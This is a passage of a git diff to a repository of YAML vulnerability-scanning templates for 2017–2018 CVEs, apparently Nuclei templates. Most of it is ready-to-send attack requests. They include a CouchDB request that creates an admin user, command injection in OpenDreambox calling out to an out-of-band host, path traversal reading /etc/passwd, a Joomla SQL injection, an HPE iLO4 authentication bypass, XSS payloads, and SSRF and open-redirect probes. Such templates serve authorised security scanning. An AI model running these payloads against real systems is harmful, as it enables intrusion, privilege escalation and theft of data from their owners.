"
+ condition: and
diff --git a/poc/cve/cve-2017-12138.yaml b/poc/cve/cve-2017-12138.yaml
index f1dcb57708..f8205c321b 100644
--- a/poc/cve/cve-2017-12138.yaml
+++ b/poc/cve/cve-2017-12138.yaml
@@ -3,26 +3,35 @@ id: CVE-2017-12138
info:
name: XOOPS Core 2.5.8 - Open Redirect
author: 0x_Akoko
- severity: low
+ severity: medium
description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
reference:
- https://github.com/XOOPS/XoopsCore25/issues/523
+ - https://xoops.org
- https://www.cvedetails.com/cve/CVE-2017-12138
- tags: cve,cve2017,redirect,xoops
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
cve-id: CVE-2017-12138
cwe-id: CWE-601
+ tags: cve,cve2017,redirect,xoops,authenticated
requests:
- - method: GET
+ - raw:
+ - |
+ POST /user.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- path:
- - '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https://www.example.com'
+ uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
+ - |
+ GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
matchers:
- type: regex
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/poc/cve/cve-2017-12542.yaml b/poc/cve/cve-2017-12542.yaml
new file mode 100644
index 0000000000..9bd0b6ab7e
--- /dev/null
+++ b/poc/cve/cve-2017-12542.yaml
@@ -0,0 +1,43 @@
+id: CVE-2017-12542
+
+info:
+ name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
+ author: pikpikcu
+ severity: critical
+ description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/44005
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
+ - https://www.exploit-db.com/exploits/44005/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2017-12542
+ tags: cve,cve2017,ilo4,hpe,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/rest/v1/AccountService/Accounts"
+
+ headers:
+ Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "iLO User"
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/11
diff --git a/poc/cve/cve-2017-12544.yaml b/poc/cve/cve-2017-12544.yaml
new file mode 100644
index 0000000000..36efd6b1d9
--- /dev/null
+++ b/poc/cve/cve-2017-12544.yaml
@@ -0,0 +1,39 @@
+id: CVE-2017-12544
+
+info:
+ name: HPE System Management - XSS
+ author: divya_mudgal
+ severity: medium
+ description: Reflected Cross-site scripting (XSS) on HPE System Management
+ reference:
+ - https://seclists.org/fulldisclosure/2018/Mar/5
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
+ - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
+ - http://www.securitytracker.com/id/1039437
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2017-12544
+ cwe-id: CWE-79
+ tags: cve,cve2017,xss,hp
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "var prodName = '';prompt`document.domain`;//';"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2017-12583.yaml b/poc/cve/cve-2017-12583.yaml
index 232be74216..3fcc19e269 100644
--- a/poc/cve/cve-2017-12583.yaml
+++ b/poc/cve/cve-2017-12583.yaml
@@ -4,15 +4,16 @@ info:
name: Reflected XSS in doku.php
author: DhiyaneshDK
severity: medium
- metadata:
- shodan-query: 'http.title:"DokuWiki"'
- description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php."
- reference: https://github.com/splitbrain/dokuwiki/issues/2061
+ description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php.
+ reference:
+ - https://github.com/splitbrain/dokuwiki/issues/2061
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-12583
cwe-id: CWE-79
+ metadata:
+ shodan-query: http.title:"DokuWiki"
tags: cve,cve2017,xss,dokuwiki
requests:
diff --git a/poc/cve/cve-2017-12635.yaml b/poc/cve/cve-2017-12635.yaml
new file mode 100644
index 0000000000..2999c299a2
--- /dev/null
+++ b/poc/cve/cve-2017-12635.yaml
@@ -0,0 +1,55 @@
+id: CVE-2017-12635
+
+info:
+ name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
+ author: pikpikcu
+ severity: critical
+ description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12635
+ - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
+ - http://www.securityfocus.com/bid/101868
+ - https://security.gentoo.org/glsa/201711-16
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2017-12635
+ cwe-id: CWE-269
+ tags: cve,cve2017,couchdb,apache
+
+requests:
+ - raw:
+ - |
+ PUT /_users/org.couchdb.user:poc HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json
+
+ {
+ "type": "user",
+ "name": "poc",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "123456"
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - "Location:"
+
+ - type: word
+ part: body
+ words:
+ - "org.couchdb.user:poc"
+ - "conflict"
+ - "Document update conflict"
+
+ - type: status
+ status:
+ - 201
+ - 409
+
+# Enhanced by mp on 2022/05/11
diff --git a/poc/cve/cve-2017-12794.yaml b/poc/cve/cve-2017-12794.yaml
index ad1ea847cc..02b2f66ae2 100644
--- a/poc/cve/cve-2017-12794.yaml
+++ b/poc/cve/cve-2017-12794.yaml
@@ -1,20 +1,22 @@
id: CVE-2017-12794
info:
- name: Django debug page XSS
+ name: Django Debug Page - Cross-Site Scripting
author: pikpikcu
severity: medium
+ description: |
+ Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible).
reference:
- https://twitter.com/sec715/status/1406779605055270914
- https://nvd.nist.gov/vuln/detail/CVE-2017-12794
- description: |
- In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings.
- tags: xss,django,cve,cve2017
+ - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
+ - http://www.securitytracker.com/id/1039264
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-12794
cwe-id: CWE-79
+ tags: xss,django,cve,cve2017
requests:
- method: GET
@@ -36,3 +38,5 @@ requests:
words:
- "text/html"
part: header
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/cve-2017-14135.yaml b/poc/cve/cve-2017-14135.yaml
new file mode 100644
index 0000000000..3f7e57637b
--- /dev/null
+++ b/poc/cve/cve-2017-14135.yaml
@@ -0,0 +1,46 @@
+id: CVE-2017-14135
+
+info:
+ name: OpenDreambox 2.0.0 - Remote Code Execution
+ author: alph4byt3
+ severity: critical
+ description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
+ reference:
+ - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
+ - https://www.exploit-db.com/exploits/42293
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14135
+ - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2017-14135
+ cwe-id: CWE-78
+ metadata:
+ shodan-query: title:"Dreambox WebControl"
+ tags: cve,cve2017,dreambox,rce,oast
+
+requests:
+ - raw:
+ - |
+ GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "/bin/sh"
+ - "/usr/script"
+ condition: and
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/11
diff --git a/poc/cve/cve-2017-14537.yaml b/poc/cve/cve-2017-14537.yaml
index 59784daa6f..66f9cfe5ba 100644
--- a/poc/cve/cve-2017-14537.yaml
+++ b/poc/cve/cve-2017-14537.yaml
@@ -1,49 +1,51 @@
id: CVE-2017-14537
info:
- name: trixbox 2.8.0 - directory-traversal
+ name: Trixbox 2.8.0 - Path Traversal
author: pikpikcu
severity: medium
-
-# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
-# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
-# Product vendor:-https://sourceforge.net/projects/asteriskathome/
+ description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
+ reference:
+ - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
+ - https://sourceforge.net/projects/asteriskathome/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2017-14537
+ cwe-id: CWE-22
+ tags: cve,cve2017,trixbox,lfi
requests:
- raw:
- |
POST /maint/index.php?packages HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/maint/index.php?packages
- Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
- Connection: keep-alive
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
- |
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: {{Hostname}}/maint/index.php?packages
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/cve-2017-17059.yaml b/poc/cve/cve-2017-17059.yaml
index 5fcc0923df..fe491e117d 100644
--- a/poc/cve/cve-2017-17059.yaml
+++ b/poc/cve/cve-2017-17059.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-17059
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: POST
diff --git a/poc/cve/cve-2017-18024.yaml b/poc/cve/cve-2017-18024.yaml
index 2978f46ded..f10df9314d 100644
--- a/poc/cve/cve-2017-18024.yaml
+++ b/poc/cve/cve-2017-18024.yaml
@@ -4,17 +4,17 @@ info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
+ description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
reference:
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
- description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
- tags: cve,cve2017,xss,avantfax
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-18024
cwe-id: CWE-79
+ tags: cve,cve2017,xss,avantfax
requests:
- raw:
diff --git a/poc/cve/cve-2017-18598.yaml b/poc/cve/cve-2017-18598.yaml
index 8ead934948..3b783df22d 100644
--- a/poc/cve/cve-2017-18598.yaml
+++ b/poc/cve/cve-2017-18598.yaml
@@ -1,15 +1,15 @@
id: CVE-2017-18598
info:
- name: WordPress Qards - Cross-Site Scripting
+ name: Qards Plugin - Stored XSS and SSRF
author: pussycat0x
severity: medium
- description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.
+ description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
reference:
- https://wpscan.com/vulnerability/8934
- https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- - https://wpvulndb.com/vulnerabilities/8934
- https://nvd.nist.gov/vuln/detail/CVE-2017-18598
+ - https://wpvulndb.com/vulnerabilities/8934
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -32,6 +32,4 @@ requests:
- type: word
part: body
words:
- - "console.log"
-
-# Enhanced by mp on 2022/08/12
+ - "console.log"
\ No newline at end of file
diff --git a/poc/cve/cve-2017-18638.yaml b/poc/cve/cve-2017-18638.yaml
new file mode 100644
index 0000000000..4cf8aec3d8
--- /dev/null
+++ b/poc/cve/cve-2017-18638.yaml
@@ -0,0 +1,29 @@
+id: CVE-2017-18638
+
+info:
+ name: Graphite 'graphite.composer.views.send_email' SSRF
+ author: huowuzhao
+ severity: high
+ description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
+ reference:
+ - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
+ - https://github.com/graphite-project/graphite-web/issues/2008
+ - https://github.com/advisories/GHSA-vfj6-275q-4pvm
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-18638
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2017-18638
+ cwe-id: CWE-918
+ tags: cve,cve2017,graphite,ssrf,oast
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
diff --git a/poc/cve/cve-2017-5982.yaml b/poc/cve/cve-2017-5982.yaml
index 1f114f79b3..fe0f9bdd7f 100644
--- a/poc/cve/cve-2017-5982.yaml
+++ b/poc/cve/cve-2017-5982.yaml
@@ -1,4 +1,5 @@
id: CVE-2017-5982
+
info:
name: Kodi 17.1 Local File Inclusion
author: 0x_Akoko
@@ -7,6 +8,8 @@ info:
reference:
- https://cxsecurity.com/issue/WLB-2017020164
- https://www.cvedetails.com/cve/CVE-2017-5982
+ - https://www.exploit-db.com/exploits/41312/
+ - http://seclists.org/fulldisclosure/2017/Feb/27
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
diff --git a/poc/cve/cve-2017-7529.yaml b/poc/cve/cve-2017-7529.yaml
new file mode 100644
index 0000000000..b05d81075d
--- /dev/null
+++ b/poc/cve/cve-2017-7529.yaml
@@ -0,0 +1,29 @@
+id: CVE-2017-7529
+info:
+ author: "Harsh Bothra"
+ name: "Nginx Remote Integer Overflow"
+ severity: medium
+
+# This template supports the detection part only.
+# Do not test any website without permission
+# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Range: bytes=-17208,-9223372036854758792
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 206
+ - type: word
+ words:
+ - Content-Range
+ part: all
\ No newline at end of file
diff --git a/poc/cve/cve-2017-8917.yaml b/poc/cve/cve-2017-8917.yaml
index 6569d699db..bbbf1e7547 100644
--- a/poc/cve/cve-2017-8917.yaml
+++ b/poc/cve/cve-2017-8917.yaml
@@ -9,8 +9,8 @@ info:
reference:
- https://www.cvedetails.com/cve/CVE-2017-8917/
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- - http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515
- - http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522
+ - http://www.securityfocus.com/bid/98515
+ - http://www.securitytracker.com/id/1038522
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -18,18 +18,15 @@ info:
cwe-id: CWE-89
tags: cve,cve2017,joomla,sqli
-variables:
- num: "999999999"
-
requests:
- method: GET
path:
- - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
+ - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
matchers:
- type: word
part: body
words:
- - '{{md5({{num}})}}'
+ - "cf79ae6addba60ad018347359bd144d2"
# Enhanced by mp on 2022/05/11
diff --git a/poc/cve/cve-2017-9140.yaml b/poc/cve/cve-2017-9140.yaml
index 6fd9b5c7e9..df598c2967 100644
--- a/poc/cve/cve-2017-9140.yaml
+++ b/poc/cve/cve-2017-9140.yaml
@@ -4,17 +4,19 @@ info:
name: Reflected XSS - Telerik Reporting Module
author: dhiyaneshDk
severity: medium
- tags: cve,cve2017,xss,telerik
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
- remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
+ - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module
+ - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406)
+ remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-9140
cwe-id: CWE-79
+ tags: cve,cve2017,xss,telerik
requests:
- method: GET
diff --git a/poc/cve/cve-2017-9288.yaml b/poc/cve/cve-2017-9288.yaml
index 843b3c84d2..bc6706fc06 100644
--- a/poc/cve/cve-2017-9288.yaml
+++ b/poc/cve/cve-2017-9288.yaml
@@ -5,13 +5,17 @@ info:
author: daffainfo
severity: medium
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ - https://github.com/MindscapeHQ/raygun4wordpress/pull/17
+ - https://github.com/MindscapeHQ/raygun4wordpress/issues/16
+ - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-9288
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/poc/cve/cve-2017-9506.yaml b/poc/cve/cve-2017-9506.yaml
index 9106898094..393153702a 100644
--- a/poc/cve/cve-2017-9506.yaml
+++ b/poc/cve/cve-2017-9506.yaml
@@ -2,16 +2,29 @@ id: CVE-2017-9506
info:
name: Jira IconURIServlet SSRF
- author: pd-team
- severity: high
+ author: pdteam
+ severity: medium
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
+ reference:
+ - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
+ - https://ecosystem.atlassian.net/browse/OAUTH-344
+ - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-9506
+ cwe-id: CWE-918
+ tags: cve,cve2017,atlassian,jira,ssrf,oast
requests:
- - method: GET
- path:
- - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
+ - raw:
+ - |
+ GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+
matchers:
- type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
words:
- - "ipinfo.io/missingauth"
- part: body
+ - "http"
diff --git a/poc/cve/cve-2017-9805.yaml b/poc/cve/cve-2017-9805.yaml
index c62b854a41..fafd5baa0e 100644
--- a/poc/cve/cve-2017-9805.yaml
+++ b/poc/cve/cve-2017-9805.yaml
@@ -5,34 +5,24 @@ info:
author: pikpikcu
severity: high
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
- remediation: |
- Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
reference:
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- https://struts.apache.org/docs/s2-052.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-9805
- - http://www.securitytracker.com/id/1039263
- - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-9805
cwe-id: CWE-502
- epss-score: 0.97545
- epss-percentile: 0.99994
- cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*
- metadata:
- max-request: 2
- vendor: apache
- product: struts
- tags: cve,cve2017,apache,rce,struts,kev
+ tags: cve,cve2017,apache,rce,struts
-http:
+requests:
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
- "{{BaseURL}}/orders/3"
-
+ headers:
+ Content-Type: application/xml
body: |
- headers:
- Content-Type: application/xml
-
matchers-condition: and
matchers:
+
- type: word
words:
- "Debugging information"
@@ -107,4 +95,4 @@ http:
status:
- 500
-# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950
+# Enhanced by mp on 2022/04/20
diff --git a/poc/cve/cve-2018-0127.yaml b/poc/cve/cve-2018-0127.yaml
new file mode 100644
index 0000000000..3ad69c3b88
--- /dev/null
+++ b/poc/cve/cve-2018-0127.yaml
@@ -0,0 +1,40 @@
+id: CVE-2018-0127
+
+info:
+ name: Cisco RV132W/RV134W Router - Information Disclosure
+ author: jrolf
+ severity: critical
+ description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
+ reference:
+ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
+ - http://www.securitytracker.com/id/1040345
+ - http://www.securityfocus.com/bid/102969
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-0127
+ cwe-id: CWE-306
+ tags: cve,cve2018,cisco,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dumpmdm.cmd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ condition: and
+ words:
+ - "Dump"
+ - "MDM"
+ - "cisco"
+ - "admin"
+
+# Enhanced by mp on 2022/05/12
diff --git a/poc/cve/cve-2018-1000130.yaml b/poc/cve/cve-2018-1000130.yaml
index 9b56c41fde..8fe310b37c 100644
--- a/poc/cve/cve-2018-1000130.yaml
+++ b/poc/cve/cve-2018-1000130.yaml
@@ -5,15 +5,15 @@ info:
author: milo2012
severity: high
description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
- tags: cve,cve2018,jolokia,rce,jndi,proxy
+ reference:
+ - https://jolokia.org/#Security_fixes_with_1.5.0
